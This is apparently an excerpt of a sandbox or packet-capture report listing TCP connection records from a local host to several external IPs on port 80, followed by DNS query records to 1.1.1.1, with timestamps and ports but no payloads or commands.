                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.347553015 CET4988180192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.755356073 CET805008418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.759393930 CET5008480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.765141964 CET805008418.246.231.120192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.767282963 CET5008480192.168.2.418.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.776010036 CET5008580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.781646967 CET805008518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.781791925 CET5008580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.781877995 CET5008580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.781934977 CET5008580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.787399054 CET805008518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:55.788636923 CET805008518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.442166090 CET805008518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.442378044 CET5008580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.448143005 CET805008518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.448237896 CET5008580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.549897909 CET5008680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.555288076 CET805008644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.555979013 CET5008680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.556308031 CET5008680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.556386948 CET5008680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.561698914 CET805008644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:56.562087059 CET805008644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.232316017 CET805008644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.243707895 CET5008680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.250118971 CET805008644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.250269890 CET5008680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.272563934 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.278068066 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.278136969 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.278640032 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.278656006 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.284146070 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.284177065 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.961080074 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.961169004 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.961287022 CET5008780192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.963443995 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.966777086 CET805008772.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969105005 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969188929 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969413042 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.969492912 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.974955082 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:57.974988937 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.684798956 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.684897900 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.684993982 CET5008880192.168.2.472.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.690426111 CET805008872.52.178.23192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.701989889 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707467079 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707544088 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707676888 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.707676888 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.713041067 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:58.713093042 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.369520903 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.369813919 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.375643015 CET805008944.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.375706911 CET5008980192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.384251118 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.389800072 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.389890909 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.389998913 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.390033960 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.395373106 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:59.395427942 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.845782042 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.846437931 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.852531910 CET805009018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.853084087 CET5009080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.861627102 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867089987 CET805009118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867189884 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867338896 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.867340088 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.872701883 CET805009118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:00.873590946 CET805009118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.340914011 CET5009180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.344136000 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350424051 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350631952 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350792885 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.350812912 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.356204033 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:01.356575012 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.025896072 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.026079893 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.032074928 CET805009218.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.032146931 CET5009280192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.041990042 CET5009380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.047734022 CET8050093172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.050673008 CET5009380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.050962925 CET5009380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.050992966 CET5009380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.056488991 CET8050093172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.057085037 CET8050093172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.723834038 CET8050093172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.724571943 CET5009380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.724729061 CET5009380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.726437092 CET5009480192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.730273962 CET8050093172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.732075930 CET8050094172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.732160091 CET5009480192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.740770102 CET5009480192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.740839958 CET5009480192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.746592999 CET8050094172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:02.746793985 CET8050094172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.424483061 CET8050094172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.424570084 CET5009480192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.428817987 CET5009480192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.434566975 CET8050094172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.447858095 CET5009580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.454601049 CET805009554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.454687119 CET5009580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.454838037 CET5009580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.454881907 CET5009580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.460711002 CET805009554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:03.460776091 CET805009554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.321760893 CET805009554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.327788115 CET5009580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.333466053 CET805009554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.333520889 CET5009580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.364394903 CET5009680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.369858980 CET805009644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.371294022 CET5009680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.372863054 CET5009680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.372885942 CET5009680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.378274918 CET805009644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:04.378299952 CET805009644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.034065962 CET805009644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.034310102 CET5009680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.040102005 CET805009644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.040143967 CET5009680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.053929090 CET5009780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.060501099 CET805009734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.060811996 CET5009780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.060811996 CET5009780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.060961962 CET5009780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.066185951 CET805009734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.066278934 CET805009734.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.325556993 CET5009780192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.329422951 CET5009880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.334856033 CET805009834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.337999105 CET5009880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.338185072 CET5009880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.338402987 CET5009880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.343740940 CET805009834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:05.343749046 CET805009834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.177078962 CET805009834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.197318077 CET5009880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.213154078 CET5009980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.214237928 CET805009834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.214313030 CET5009880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.218553066 CET805009934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.218636036 CET5009980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.218760014 CET5009980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.218786001 CET5009980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.224132061 CET805009934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:06.224148989 CET805009934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.048444986 CET805009934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.048649073 CET5009980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.054898977 CET805009934.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.054975986 CET5009980192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.063529968 CET5010080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.069180965 CET805010034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.069300890 CET5010080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.069463968 CET5010080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.069488049 CET5010080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.074928999 CET805010034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:07.074971914 CET805010034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.046047926 CET805010034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.046272039 CET5010080192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.052400112 CET805010034.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:39:08.052475929 CET5010080192.168.2.434.246.200.160

                                                                                                                                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.113347054 CET6000753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:04.121606112 CET53600071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.261127949 CET5393153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.269409895 CET53539311.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.311547995 CET6036953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:05.319415092 CET53603691.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.236902952 CET6191953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.245568991 CET53619191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.761578083 CET6224153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:06.769892931 CET53622411.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.719840050 CET6026453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.728605986 CET53602641.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.919311047 CET5660953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:07.927951097 CET53566091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.898142099 CET5922953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:08.907440901 CET53592291.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.083473921 CET5324853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:10.091811895 CET53532481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.567037106 CET6094753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.574750900 CET53609471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.575917959 CET5829653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:11.584322929 CET53582961.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.193380117 CET6178253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.201389074 CET53617821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.201989889 CET6361253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.209506035 CET53636121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.212204933 CET5985153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:13.220756054 CET53598511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.412399054 CET5082953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:25.421147108 CET53508291.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.509037018 CET5813253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:33.519412041 CET53581321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.325082064 CET6012353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:35.334454060 CET53601231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.878343105 CET6189353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:36.886341095 CET53618931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.658814907 CET5001853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:37.667464972 CET53500181.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.284729958 CET5822453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:39.294538021 CET53582241.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.838498116 CET5514153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:40.846508980 CET53551411.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.963037014 CET5542353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:41.971065044 CET53554231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.779285908 CET6468553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:42.787955999 CET53646851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.785883904 CET5119453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:43.794147015 CET53511941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.423860073 CET5163953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:45.433351994 CET53516391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.243688107 CET5572153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:46.251792908 CET53557211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:47.574608088 CET6285453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.559761047 CET6285453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.618130922 CET53628541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:48.618159056 CET53628541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.671900988 CET6145053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:49.680011988 CET53614501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.485505104 CET5849453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:50.494144917 CET53584941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:37:51.718117952 CET5535553192.168.2.41.1.1.1
